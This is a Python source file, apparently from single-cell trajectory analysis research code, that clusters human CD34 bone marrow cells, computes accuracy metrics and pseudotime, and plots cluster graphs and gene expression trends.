def draw_piechart_graph(self, ax, ax1, type_pt='original', ):
arrow_head_w = 0.2
edgeweight_scale = 1
node_pos = self.graph_node_pos
edgelist = list(self.edgelist_maxout)
edgeweight = self.edgeweights_maxout
node_pos = np.asarray(node_pos)
graph_node_label = self.graph_node_label
if type_pt == 'original': pt = self.scaled_hitting_times
if type_pt == 'biased_stationary': pt = self.biased_hitting_times_stationary
if type_pt == 'markov': pt = self.markov_hitting_times
import matplotlib.lines as lines
n_groups = len(set(self.labels)) # node_pos.shape[0]
n_truegroups = len(set(self.true_label))
group_pop = np.zeros([n_groups, 1])
group_frac = pd.DataFrame(np.zeros([n_groups, n_truegroups]), columns=list(set(self.true_label)))
for group_i in set(self.labels):
loc_i = np.where(self.labels == group_i)[0]
group_pop[group_i] = len(loc_i) # np.sum(loc_i) / 1000 + 1
true_label_in_group_i = list(np.asarray(self.true_label)[[loc_i]])
for ii in set(true_label_in_group_i):
group_frac[ii][group_i] = true_label_in_group_i.count(ii)
group_frac = group_frac.div(group_frac.sum(axis=1), axis=0)
line_true = np.linspace(0, 1, n_truegroups)
color_true_list = [plt.cm.jet(color) for color in line_true]
sct = ax.scatter(
node_pos[:, 0], node_pos[:, 1],
c='white', edgecolors='face', s=group_pop, cmap='jet')
print('draw triangle edgelist', len(edgelist), edgelist)
for e_i, (start, end) in enumerate(edgelist):
if pt[start] > pt[end]:
temp = start
start = end
end = temp
ax.add_line(lines.Line2D([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]],
color='grey', lw=edgeweight[e_i] * edgeweight_scale, alpha=0.2))
z = np.polyfit([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]], 1)
minx = np.min(np.array([node_pos[start, 0], node_pos[end, 0]]))
if (node_pos[start, 0] < node_pos[end, 0]):
direction_arrow = 1
else:
direction_arrow = -1
maxx = np.max(np.array([node_pos[start, 0], node_pos[end, 0]]))
xp = np.linspace(minx, maxx, 500)
p = np.poly1d(z)
smooth = p(xp)
step = 1
if direction_arrow == 1:
ax.arrow(xp[250], smooth[250], xp[250 + step] - xp[250], smooth[250 + step] - smooth[250], shape='full',
lw=0,
length_includes_head=True, head_width=arrow_head_w,
color='grey')
# ax.plot(xp, smooth, linewidth=edgeweight[e_i], c='pink')
else:
ax.arrow(xp[250], smooth[250], xp[250 - step] - xp[250],
smooth[250 - step] - smooth[250], shape='full', lw=0,
length_includes_head=True, head_width=arrow_head_w, color='grey')
trans = ax.transData.transform
bbox = ax.get_position().get_points()
ax_x_min = bbox[0, 0]
ax_x_max = bbox[1, 0]
ax_y_min = bbox[0, 1]
ax_y_max = bbox[1, 1]
ax_len_x = ax_x_max - ax_x_min
ax_len_y = ax_y_max - ax_y_min
trans2 = ax.transAxes.inverted().transform
pie_axs = []
pie_size_ar = ((group_pop - np.min(group_pop)) / (np.max(group_pop) - np.min(group_pop)) + 0.5) / 10
for node_i in range(n_groups):
pie_size = pie_size_ar[node_i][0]
x1, y1 = trans(node_pos[node_i]) # data coordinates
xa, ya = trans2((x1, y1)) # axis coordinates
xa = ax_x_min + (xa - pie_size / 2) * ax_len_x
ya = ax_y_min + (ya - pie_size / 2) * ax_len_y
# clip, the fruchterman layout sometimes places below figure
# if ya < 0: ya = 0
# if xa < 0: xa = 0
rect = [xa, ya, pie_size * ax_len_x, pie_size * ax_len_y]
frac = group_frac.iloc[node_i].values
pie_axs.append(plt.axes(rect, frameon=False))
pie_axs[node_i].pie(frac, wedgeprops={'linewidth': 0.0}, colors=color_true_list)
pie_axs[node_i].set_xticks([])
pie_axs[node_i].set_yticks([])
pie_axs[node_i].set_aspect('equal')
pie_axs[node_i].text(0.5, 0.5, graph_node_label[node_i])
patches, texts = pie_axs[node_i].pie(frac, wedgeprops={'linewidth': 0.0}, colors=color_true_list)
labels = list(set(self.true_label))
plt.legend(patches, labels, loc=(-5, -5), fontsize=6)
if self.too_big_factor > 0.1:
is_sub = ' super clusters'
else:
is_sub = ' sub clusters'
ti = 'Reference Group Membership. K=' + str(self.knn) + '. ncomp = ' + str(self.ncomp) + is_sub
ax.set_title(ti)
title_list = ["PT using Markov Simulation"]#, "PT on undirected original graph"]
for i, ax_i in enumerate([ax1]):
print("drawing axis", i)
if i == 0: pt = self.markov_hitting_times
if i == 1: pt = self.hitting_times
for e_i, (start, end) in enumerate(edgelist):
if pt[start] > pt[end]:
temp = start
start = end
end = temp
ax_i.add_line(
lines.Line2D([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]],
color='black', lw=edgeweight[e_i] * edgeweight_scale, alpha=0.5))
z = np.polyfit([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]], 1)
minx = np.min(np.array([node_pos[start, 0], node_pos[end, 0]]))
if (node_pos[start, 0] < node_pos[end, 0]):
direction_arrow = 1
else:
direction_arrow = -1
maxx = np.max(np.array([node_pos[start, 0], node_pos[end, 0]]))
xp = np.linspace(minx, maxx, 500)
p = np.poly1d(z)
smooth = p(xp)
step = 1
if direction_arrow == 1:
ax_i.arrow(xp[250], smooth[250], xp[250 + step] - xp[250], smooth[250 + step] - smooth[250],
shape='full', lw=0,
length_includes_head=True, head_width=arrow_head_w,
color='grey')
else:
ax_i.arrow(xp[250], smooth[250], xp[250 - step] - xp[250],
smooth[250 - step] - smooth[250], shape='full', lw=0,
length_includes_head=True, head_width=arrow_head_w, color='grey')
c_edge = []
l_width = []
for ei, pti in enumerate(pt):
if ei in self.terminal_clusters:
c_edge.append('red')
l_width.append(1.5)
else:
c_edge.append('gray')
l_width.append(0.0)
gp_scaling = 500 / max(group_pop)
print(gp_scaling, 'gp_scaline')
group_pop_scale = group_pop * gp_scaling
ax_i.scatter(node_pos[:, 0], node_pos[:, 1], s=group_pop_scale, c=pt, cmap='viridis_r', edgecolors=c_edge,
alpha=1, zorder=3, linewidth=l_width)
for ii in range(node_pos.shape[0]):
ax_i.text(node_pos[ii, 0] + 0.5, node_pos[ii, 1] + 0.5, 'c' + str(ii), color='black', zorder=4)
title_pt = title_list[i]
ax_i.set_title(title_pt)
def accuracy(self, onevsall=1):
true_labels = self.true_label
Index_dict = {}
PARC_labels = self.labels
N = len(PARC_labels)
n_cancer = list(true_labels).count(onevsall)
n_pbmc = N - n_cancer
for k in range(N):
Index_dict.setdefault(PARC_labels[k], []).append(true_labels[k])
num_groups = len(Index_dict)
sorted_keys = list(sorted(Index_dict.keys()))
error_count = []
pbmc_labels = []
thp1_labels = []
fp, fn, tp, tn, precision, recall, f1_score = 0, 0, 0, 0, 0, 0, 0
for kk in sorted_keys:
vals = [t for t in Index_dict[kk]]
majority_val = self.func_mode(vals)
if majority_val == onevsall: print('cluster', kk, ' has majority', onevsall, 'with population', len(vals))
if kk == -1:
len_unknown = len(vals)
print('len unknown', len_unknown)
if (majority_val == onevsall) and (kk != -1):
thp1_labels.append(kk)
fp = fp + len([e for e in vals if e != onevsall])
tp = tp + len([e for e in vals if e == onevsall])
list_error = [e for e in vals if e != majority_val]
e_count = len(list_error)
error_count.append(e_count)
elif (majority_val != onevsall) and (kk != -1):
pbmc_labels.append(kk)
tn = tn + len([e for e in vals if e != onevsall])
fn = fn + len([e for e in vals if e == onevsall])
error_count.append(len([e for e in vals if e != majority_val]))
predict_class_array = np.array(PARC_labels)
PARC_labels_array = np.array(PARC_labels)
number_clusters_for_target = len(thp1_labels)
for cancer_class in thp1_labels:
predict_class_array[PARC_labels_array == cancer_class] = 1
for benign_class in pbmc_labels:
predict_class_array[PARC_labels_array == benign_class] = 0
predict_class_array.reshape((predict_class_array.shape[0], -1))
error_rate = sum(error_count) / N
n_target = tp + fn
tnr = tn / n_pbmc
fnr = fn / n_cancer
tpr = tp / n_cancer
fpr = fp / n_pbmc
if tp != 0 or fn != 0: recall = tp / (tp + fn) # ability to find all positives
if tp != 0 or fp != 0: precision = tp / (tp + fp) # ability to not misclassify negatives as positives
if precision != 0 or recall != 0:
f1_score = precision * recall * 2 / (precision + recall)
majority_truth_labels = np.empty((len(true_labels), 1), dtype=object)
for cluster_i in set(PARC_labels):
cluster_i_loc = np.where(np.asarray(PARC_labels) == cluster_i)[0]
true_labels = np.asarray(true_labels)
majority_truth = self.func_mode(list(true_labels[cluster_i_loc]))
majority_truth_labels[cluster_i_loc] = majority_truth
majority_truth_labels = list(majority_truth_labels.flatten())
accuracy_val = [error_rate, f1_score, tnr, fnr, tpr, fpr, precision,
recall, num_groups, n_target]
return accuracy_val, predict_class_array, majority_truth_labels, number_clusters_for_target
def run_PARC(self):
print('input data has shape', self.data.shape[0], '(samples) x', self.data.shape[1], '(features)')
self.ncomp = self.data.shape[1]
pop_list = []
for item in set(list(self.true_label)):
pop_list.append([item, list(self.true_label).count(item)])
# print("population composition", pop_list)
if self.true_label is None:
self.true_label = [1] * self.data.shape[0]
list_roc = []
time_start_total = time.time()
time_start_knn = time.time()
self.knn_struct = self.make_knn_struct()
time_end_knn_struct = time.time() - time_start_knn
# Query dataset, k - number of closest elements (returns 2 numpy arrays)
self.run_subPARC()
run_time = time.time() - time_start_total
print('time elapsed {:.1f} seconds'.format(run_time))
targets = list(set(self.true_label))
N = len(list(self.true_label))
self.f1_accumulated = 0
self.f1_mean = 0
self.stats_df = pd.DataFrame({'jac_std_global': [self.jac_std_global], 'dist_std_local': [self.dist_std_local],
'runtime(s)': [run_time]})
self.majority_truth_labels = []
if len(targets) > 1:
f1_accumulated = 0
f1_acc_noweighting = 0
for onevsall_val in targets:
#print('target is', onevsall_val)
vals_roc, predict_class_array, majority_truth_labels, numclusters_targetval = self.accuracy(
onevsall=onevsall_val)
f1_current = vals_roc[1]
print('target', onevsall_val, 'has f1-score of %.2f' % (f1_current * 100))
f1_accumulated = f1_accumulated + f1_current * (list(self.true_label).count(onevsall_val)) / N
f1_acc_noweighting = f1_acc_noweighting + f1_current
list_roc.append(
[self.jac_std_global, self.dist_std_local, onevsall_val] + vals_roc + [numclusters_targetval] + [
run_time])
f1_mean = f1_acc_noweighting / len(targets)
print("f1-score (unweighted) mean %.2f" % (f1_mean * 100), '%')
#print('f1-score weighted (by population) %.2f' % (f1_accumulated * 100), '%')
df_accuracy = pd.DataFrame(list_roc,
columns=['jac_std_global', 'dist_std_local', 'onevsall-target', 'error rate',
'f1-score', 'tnr', 'fnr',
'tpr', 'fpr', 'precision', 'recall', 'num_groups',
'population of target', 'num clusters', 'clustering runtime'])
self.f1_accumulated = f1_accumulated
self.f1_mean = f1_mean
self.stats_df = df_accuracy
self.majority_truth_labels = majority_truth_labels
return
def run_palantir_func_human34(ad, ncomps, knn, tsne, revised_clus, start_cell='c4823'):
norm_df_pal = pd.DataFrame(ad.X)
# print('norm df', norm_df_pal)
new = ['c' + str(i) for i in norm_df_pal.index]
norm_df_pal.index = new
norm_df_pal.columns =[i for i in ad.var_names]
pca_projections, _ = palantir.utils.run_pca(norm_df_pal, n_components=ncomps)
sc.tl.pca(ad, svd_solver='arpack')
dm_res = palantir.utils.run_diffusion_maps(pca_projections, n_components=ncomps, knn=knn)
ms_data = palantir.utils.determine_multiscale_space(dm_res) # n_eigs is determined using eigengap
print('ms data', ms_data.shape)
# tsne = pd.DataFrame(tsnem)#palantir.utils.run_tsne(ms_data)
tsne.index = new
# print(type(tsne))
str_true_label = pd.Series(revised_clus, index=norm_df_pal.index)
palantir.plot.plot_cell_clusters(tsne, str_true_label)
# start_cell = 'c4823' # '#C108 for M12 connected' #M8n1000d1000 start - c107 #c1001 for bifurc n2000d1000 #disconnected n1000 c108, "C1 for M10 connected" # c10 for bifurcating_m4_n2000d1000
pr_res = palantir.core.run_palantir(ms_data, early_cell=start_cell, num_waypoints=1200, knn=knn)
palantir.plot.plot_palantir_results(pr_res, tsne, knn, ncomps)
#plt.show()
imp_df = palantir.utils.run_magic_imputation(norm_df_pal, dm_res)
#imp_df.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/MAGIC_palantir_knn30ncomp100.csv')
genes = ['GATA1', 'GATA2', 'ITGA2B']#, 'SPI1']#['CD34','GATA1', 'IRF8','ITGA2B']
gene_trends = palantir.presults.compute_gene_trends( pr_res, imp_df.loc[:, genes])
palantir.plot.plot_gene_trends(gene_trends)
genes = ['MPO','ITGAX','IRF8','CSF1R','IL3RA']#'CD34','MPO', 'CD79B'
gene_trends = palantir.presults.compute_gene_trends(pr_res, imp_df.loc[:, genes])
palantir.plot.plot_gene_trends(gene_trends)
plt.show()
def slalom_human():
import os
import slalom
from slalom import plotFactors, plotRelevance, plotLoadings, saveFA, dumpFA
data_dir = '/home/shobi/Trajectory/Datasets/'
ad = sc.read(
'/home/shobi/Trajectory/Datasets/HumanCD34/human_cd34_bm_rep1.h5ad') # 5780 cells x 14651 genes Human Replicate 1. Male african american, 38 years
df_ = pd.DataFrame(ad.X)
df_.columns = [i for i in ad.var_names]
annoDB = 'custom' # ''MSigDB'
annoFile = os.path.join(data_dir, 'geneset.gmt')
data_slalom = slalom.utils.load_txt(df=df_.T, annoFiles=annoFile, annoDBs=annoDB)
print("Loaded {:d} cells, {:d} genes".format(data_slalom['Y'].shape[0], data_slalom['Y'].shape[1]))
print("Annotation: {:d} terms".format(len(data_slalom['terms'])))
print('data terms', data_slalom['terms'])
print(data_slalom['genes'])
print(data_slalom['lab'])
# I: indicator matrix that assigns genes to pathways
I = data_slalom['I'] # if loaded from the hdf file change to I = data['IMSigDB']
# Y: log expresison values
Y = data_slalom['Y']
# terms: ther names of the terms
terms = data_slalom['terms']
print("terms", terms)
# gene_ids: the ids of the genes in Y
gene_ids = data_slalom['genes']
print('gene_ids', gene_ids)
print(I.shape, Y.shape, terms.shape)
# initialize FA instance, here using a Gaussian noise model and fitting 3 dense hidden factors
FA = slalom.initFA(Y, terms, I, gene_ids=gene_ids, noise='gauss', nHidden=3, minGenes=1)
FA.train()
# print diagnostics
FA.printDiagnostics()
fig = plotRelevance(FA, madFilter=0)
# idx=FA.getTermIndex(['G2m checkpoint', 'P53 pathway'])
# print('idx',idx)
corrected_data = FA.regressOut(
terms=['M phase', 'Dna replication', 'Chromosome segregation', 'M phase of mitotic cell cycle',
'Organelle fission'])
print('corrected_data.shape', corrected_data.shape)
full_matrix = df_.copy()
print(full_matrix.head)
annotated_genes = np.array(data_slalom['genes'])[np.sum(data_slalom['I'], axis=1) != 0]
print('annotated genes', len(annotated_genes), annotated_genes)
full_matrix[annotated_genes] = corrected_data
print('full shape ', full_matrix)
return full_matrix
def main_Human(ncomps=100, knn=30, p0_random_seed=4, run_palantir_func = False):
dict_abb = {'Basophils': 'BASO1', 'CD4+ Effector Memory': 'TCEL7', 'Colony Forming Unit-Granulocytes': 'GRAN1',
'Colony Forming Unit-Megakaryocytic': 'MEGA1', 'Colony Forming Unit-Monocytes': 'MONO1',
'Common myeloid progenitors': "CMP", 'Early B cells': "PRE_B2", 'Eosinophils': "EOS2",
'Erythroid_CD34- CD71+ GlyA-': "ERY2", 'Erythroid_CD34- CD71+ GlyA+': "ERY3",
'Erythroid_CD34+ CD71+ GlyA-': "ERY1", 'Erythroid_CD34- CD71lo GlyA+': 'ERY4',
'Granulocyte/monocyte progenitors': "GMP", 'Hematopoietic stem cells_CD133+ CD34dim': "HSC1",
'Hematopoietic stem cells_CD38- CD34+': "HSC2",
'Mature B cells class able to switch': "B_a2", 'Mature B cells class switched': "B_a4",
'Mature NK cells_CD56- CD16- CD3-': "Nka3", 'Monocytes': "MONO2",
'Megakaryocyte/erythroid progenitors': "MEP", 'Myeloid Dendritic Cells': 'mDC', 'Naïve B cells': "B_a1",
'Plasmacytoid Dendritic Cells': "pDC", 'Pro B cells': 'PRE_B3'}
ncomps = ncomps# 40 ncomps and 20KNN works well
knn = knn # 30
p0_random_seed =p0_random_seed
string_ = 'ncomp =' +str(ncomps) + ' knn=' + str( knn)+ ' randseed='+ str(p0_random_seed)
#print('ncomp =', ncomps, ' knn=', knn, ' randseed=', p0_random_seed)
print(colored(string_,'blue'))
nover_labels = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/Nover_Cor_PredFine_notLogNorm.csv')[
'x'].values.tolist()
nover_labels = [dict_abb[i] for i in nover_labels]
for i in list(set(nover_labels)):
print('the population of ', i, 'is ', nover_labels.count(i))
parc53_labels = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/Nover_Cor_Parc53_set1.csv')[
'x'].values.tolist()
parclabels_all = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/parclabels_all_set1.csv')[
'parc'].values.tolist()
parc_dict_nover = {}
for i, c in enumerate(parc53_labels):
parc_dict_nover[i] = dict_abb[c]
parclabels_all = [parc_dict_nover[ll] for ll in parclabels_all]
# print('all', len(parclabels_all))
ad = sc.read(
'/home/shobi/Trajectory/Datasets/HumanCD34/human_cd34_bm_rep1.h5ad')
# 5780 cells x 14651 genes Human Replicate 1. Male african american, 38 years
print('h5ad ad size', ad)
colors = pd.Series(ad.uns['cluster_colors'])
colors['10'] = '#0b128f'
ct_colors = pd.Series(ad.uns['ct_colors'])
list_var_names = ad.var_names
# print(list_var_names)
ad.uns['iroot'] = np.flatnonzero(ad.obs_names == ad.obs['palantir_pseudotime'].idxmin())[0]
print('iroot', np.flatnonzero(ad.obs_names == ad.obs['palantir_pseudotime'].idxmin())[0])
tsne = pd.DataFrame(ad.obsm['tsne'], index=ad.obs_names, columns=['x', 'y'])
tsnem = ad.obsm['tsne']
palantir_tsne_df = pd.DataFrame(tsnem)
palantir_tsne_df.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/palantir_tsne.csv')
revised_clus = ad.obs['clusters'].values.tolist().copy()
loc_DCs = [i for i in range(5780) if ad.obs['clusters'].values.tolist()[i] == '7']
for loc_i in loc_DCs:
if ad.obsm['palantir_branch_probs'][loc_i, 5] > ad.obsm['palantir_branch_probs'][
loc_i, 2]: # if prob that cDC > pDC, then relabel as cDC
revised_clus[loc_i] = '10'
revised_clus = [int(i) for i in revised_clus]
# magic_df = ad.obsm['MAGIC_imputed_data']
# ad.X: Filtered, normalized and log transformed count matrix
# ad.raw: Filtered raw count matrix
# print('before extra filtering' ,ad.shape)
# sc.pp.filter_genes(ad, min_cells=10)
# print('after extra filtering', ad.shape)
adata_counts = sc.AnnData(
ad.X) # slalom_human())#(ad.X) # ad.X is filtered, lognormalized,scaled// ad.raw.X is the filtered but not pre-processed
adata_counts.obs_names = ad.obs_names
adata_counts.var_names = ad.var_names
# sc.pp.recipe_zheng17(adata_counts, n_top_genes=1000, log=True) #using this or the .X scaled version is pretty much the same.
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
marker = ['x', '+', (5, 0), '>', 'o', (5, 2)]
import colorcet as cc
if run_palantir_func == True:
run_palantir_func_human34(ad, ncomps, knn, tsne, revised_clus, start_cell='c4823')
# tsnem = TSNE().fit_transform(adata_counts.obsm['X_pca'])
'''
f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True)
line = np.linspace(0, 1, len(set(revised_clus)))
for color, group in zip(line, set(revised_clus)):
where = np.where(np.array(revised_clus) == group)[0]
ax1.scatter(tsnem[where, 0], tsnem[where, 1], label=group, c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend()
ax1.set_title('Palantir Phenograph Labels')
import colorcet as cc
marker = ['x', '+', (5, 0), '>', 'o', (5, 2)]
line_nover = np.linspace(0, 1, len(set(nover_labels)))
col_i = 0
for color, group in zip(line_nover, set(nover_labels)):
where = np.where(np.array(nover_labels) == group)[0]
marker_x = marker[random.randint(0, 5)]
# ax2.scatter(tsnem[where, 0],tsnem[where, 1], label=group, c=plt.cm.nipy_spectral(color), marker = marker_x, alpha=0.5)
ax2.scatter(tsnem[where, 0], tsnem[where, 1], label=group, c=cc.glasbey_dark[col_i], marker=marker_x,
alpha=0.5)
col_i = col_i + 1
ax2.legend(fontsize=6)
ax2.set_title('Novershtern Corr. Labels')
line = np.linspace(0, 1, len(set(parclabels_all)))
col_i = 0
for color, group in zip(line, set(parclabels_all)):
where = np.where(np.array(parclabels_all) == group)[0]
ax3.scatter(tsnem[where, 0], tsnem[where, 1], label=group, c=cc.glasbey_dark[col_i], alpha=0.5)
col_i = col_i + 1
ax3.legend()
ax3.set_title('Parc53 Nover Labels')
# plt.show()
'''
'''
plt.figure(figsize=[5, 5])
plt.title('palantir, ncomps = ' + str(ncomps) + ' knn' + str(knn))
for group in set(revised_clus):
loc_group = np.where(np.asarray(revised_clus) == group)[0]
plt.scatter(tsnem[loc_group, 0], tsnem[loc_group, 1], s=5, color=colors[group], label=group)
ax = plt.gca()
ax.set_axis_off()
ax.legend(fontsize=6)
'''
gene_list = ['ITGAX']#['GATA1', 'GATA2', 'ITGA2B', 'CSF1R', 'MPO', 'CD79B', 'SPI1', 'IRF8', 'CD34', 'IL3RA', 'ITGAX', 'IGHD',
#'CD27', 'CD14', 'CD22', 'ITGAM', 'CLC', 'MS4A3', 'FCGR3A', 'CSF1R']
for gene_name in gene_list:# 'GATA2',
loc_gata = np.where(np.asarray(ad.var_names) == gene_name)[0][0]
print('gene name', gene_name, loc_gata)
#print('xpca',norm_df['X_pca'])
true_label = nover_labels # revised_clus
print('p0 random seed', p0_random_seed)
#df_temp_write = pd.DataFrame(adata_counts.obsm['X_pca'][:, 0:200])
#df_temp_write.to_csv("/home/shobi/Trajectory/Datasets/HumanCD34/Human_CD34_200PCA.csv")
p0 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.4,
pseudotime=True, path="/home/shobi/Trajectory/Datasets/HumanCD34/",
root_user=4823, dataset='humanCD34', preserve_disconnected=True, random_seed=p0_random_seed, do_magic_bool=True, is_coarse = True) # *.4 root=1,
p0.run_PARC()
super_labels = p0.labels
df_ = pd.DataFrame(ad.X)
df_.columns = [i for i in ad.var_names]
print('start magic')
gene_list_magic = ['IL3RA', 'IRF8', 'GATA1', 'GATA2', 'ITGA2B', 'MPO', 'CD79B','SPI1', 'CD34','CSF1R','ITGAX']
df_magic = p0.do_magic(df_,magic_steps=3, gene_list=gene_list_magic )
print('end magic', df_magic.shape)
print('super labels', set(super_labels))
ad.obs['parc0_label'] = [str(i) for i in super_labels]
magic_ad = ad.obsm['MAGIC_imputed_data']
magic_ad = sc.AnnData(magic_ad)
magic_ad.obs_names = ad.obs_names
magic_ad.var_names = ad.var_names
magic_ad.obs['parc0_label'] = [str(i) for i in super_labels]
marker_genes = {"ERY": ['GATA1', 'GATA2', 'ITGA2B'], "BCell": ['IGHD', 'CD22'],
"DC": ['IRF8', 'IL3RA', 'IRF4', 'CSF2RA','ITGAX'],
"MONO": ['CD14', 'SPI1', 'MPO', 'IL12RB1', 'IL13RA1', 'C3AR1', 'FCGR3A'], 'HSC': ['CD34']}
print('make the p0 matrix plot')
sc.pl.matrixplot(magic_ad, marker_genes, groupby='parc0_label')
'''
sc.tl.rank_genes_groups(ad, groupby='parc0_label', use_raw=True,
method='wilcoxon', n_genes=10) # compute differential expression
sc.pl.rank_genes_groups_heatmap(ad, n_genes=10, groupby="parc0_label", show_gene_labels=True, use_raw=False)
sc.pl.rank_genes_groups_tracksplot(ad, groupby='parc0_label', n_genes = 3) # plot the result
print('show the matrix plot')
'''
super_edges = p0.edgelist_maxout # p0.edgelist
super_pt = p0.scaled_hitting_times # pseudotime pt
p = hnswlib.Index(space='l2', dim=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[1])
p.init_index(max_elements=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[0], ef_construction=200, M=16)
p.add_items(adata_counts.obsm['X_pca'][:, 0:ncomps])
p.set_ef(50)
tsi_list = [] # find the single-cell which is nearest to the average-location of a terminal cluster
for tsi in p0.terminal_clusters:
loc_i = np.where(super_labels == tsi)[0]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
#print(labelsq[0])
tsi_list.append(labelsq[0][0])
p1 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.05,
path="/home/shobi/Trajectory/Datasets/HumanCD34/", pseudotime=True,
super_cluster_labels=super_labels, super_node_degree_list=p0.node_degree_list,
super_terminal_cells=tsi_list, root_user=4823,
x_lazy=0.99, alpha_teleport=0.99, dataset='humanCD34', preserve_disconnected=True,
super_terminal_clusters=p0.terminal_clusters, is_coarse = False, full_neighbor_array=p0.full_neighbor_array, ig_full_graph=p0.ig_full_graph,csr_array_pruned=p0.csr_array_pruned) # *.4super_terminal_cells = tsi_list #3root=1,
p1.run_PARC()
labels = p1.labels
ad.obs['parc1_label'] = [str(i) for i in labels]
tsi_list = [] # find the single-cell which is nearest to the average-location of a terminal cluster
for tsi in p1.revised_super_terminal_clusters:
loc_i = np.where(super_labels == tsi)[0]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
print(labelsq[0])
tsi_list.append(labelsq[0][0])
'''
sc.tl.rank_genes_groups(ad, groupby='parc1_label', use_raw=True,
method='wilcoxon', n_genes=10) # compute differential expression
sc.pl.matrixplot(ad, marker_genes, groupby='parc1_label', use_raw=False)
sc.pl.rank_genes_groups_heatmap(ad, n_genes=3, groupby="parc1_label", show_gene_labels=True, use_raw=False)
'''
label_df = pd.DataFrame(labels, columns=['parc'])
# label_df.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/parclabels.csv', index=False)
gene_ids = adata_counts.var_names
obs = ad.raw.X.toarray()
print('shape obs', obs.shape)
obs = pd.DataFrame(obs, columns=gene_ids)
# obs['parc']=p1.labels
obs['louvain'] = revised_clus
# obs_average = obs.groupby('parc', as_index=True).mean()
obs_average = obs.groupby('louvain', as_index=True).mean()
print(obs_average.head())
# obs_average.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/louvain_palantir_average.csv', index=False)
ad_obs = sc.AnnData(obs_average)
ad_obs.var_names = gene_ids
ad_obs.obs['parc'] = [i for i in range(len(set(revised_clus)))] # p1.labels instaed of revised_clus
# sc.write('/home/shobi/Trajectory/Datasets/HumanCD34/louvain_palantir_average.h5ad',ad_obs)
# fig_0, ax_0 = plt.subplots()
loaded_magic_df = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/MAGIC_palantir_knn30ncomp100_subset.csv')
loaded_magic_df.head()
for gene_name in ['ITGA2B','IL3RA','ITGAX','IRF8']:#['GATA1', 'GATA2', 'ITGA2B', 'MPO', 'CD79B','IRF8','SPI1', 'CD34','CSF1R','IL3RA','IRF4', 'CSF2RA','ITGAX']:
print('gene name', gene_name)
#DC markers https://www.cell.com/pb-assets/products/nucleus/nucleus-phagocytes/rnd-systems-dendritic-cells-br.pdf
gene_name_dict = {'GATA1': 'GATA1', 'GATA2': 'GATA2', 'ITGA2B': 'CD41 (Mega)', 'MPO':'MPO (Mono)', 'CD79B':'CD79B (B)','IRF8':'IRF8 (DC)', 'SPI1':'PU.1','CD34': 'CD34','CSF1R':'CSF1R (pDC. Up then Down in cDC)','IL3RA':'CD123 (pDC)','IRF4': 'IRF4 (pDC)', 'ITGAX':'ITGAX (cDCs)','CSF2RA':'CSF2RA (cDC)'}
#loc_gata = np.where(np.asarray(ad.var_names) == gene_name)[0][0]
#magic_ad = ad.obsm['MAGIC_imputed_data'][:, loc_gata]
#magic_ad=loaded_magic_df[gene_name]
subset_ = df_magic[gene_name].values
print(subset_.shape)
#print('shapes of magic_ad 1 and 2', magic_ad.shape,subset_.shape)
#p1.get_gene_expression(magic_ad,title_gene = gene_name_dict[gene_name])
p1.get_gene_expression(subset_, title_gene = gene_name_dict[gene_name]+'VIA MAGIC')
print('start tsne')
n_downsample = 4000
if len(labels) > n_downsample:
# idx = np.random.randint(len(labels), size=4000)
np.random.seed(2357)
idx = np.random.choice(a=np.arange(0, len(labels)), size=5780, replace=False, p=None)
super_labels = np.asarray(super_labels)[idx]
labels = list(np.asarray(labels)[idx])
print('labels p1', len(labels), set(labels))
true_label = list(np.asarray(true_label)[idx])
sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov)[idx])
#graph_hnsw = p0.knngraph_visual()
embedding = tsnem[idx, :] # TSNE().fit_transform(adata_counts.obsm['X_pca'][idx, :])
# embedding = umap.UMAP().fit_transform(adata_counts.obsm['X_pca'][idx, 0:20])
print('size of downsampled embedding', embedding.shape)
else:
# embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][:,0:15])
# print('tsne input size', adata_counts.obsm['X_pca'].shape)
embedding = tsnem # umap.UMAP().fit_transform(adata_counts.obsm['X_pca'][:,0:20])
idx = np.random.randint(len(labels), size=len(labels))
print('end tsne')
knn_hnsw, ci_list = sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx)
super_clus_ds_PCA_loc = sc_loc_ofsuperCluster_PCAspace( p0, p1, idx)
draw_trajectory_gams(embedding,super_clus_ds_PCA_loc, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p1.revised_super_terminal_clusters,
sub_terminal_clusters=p1.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
# final_super_terminal=p0.terminal clusters
'''
draw_trajectory_dimred(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
plt.show()
'''
num_group = len(set(true_label))
line = np.linspace(0, 1, num_group)
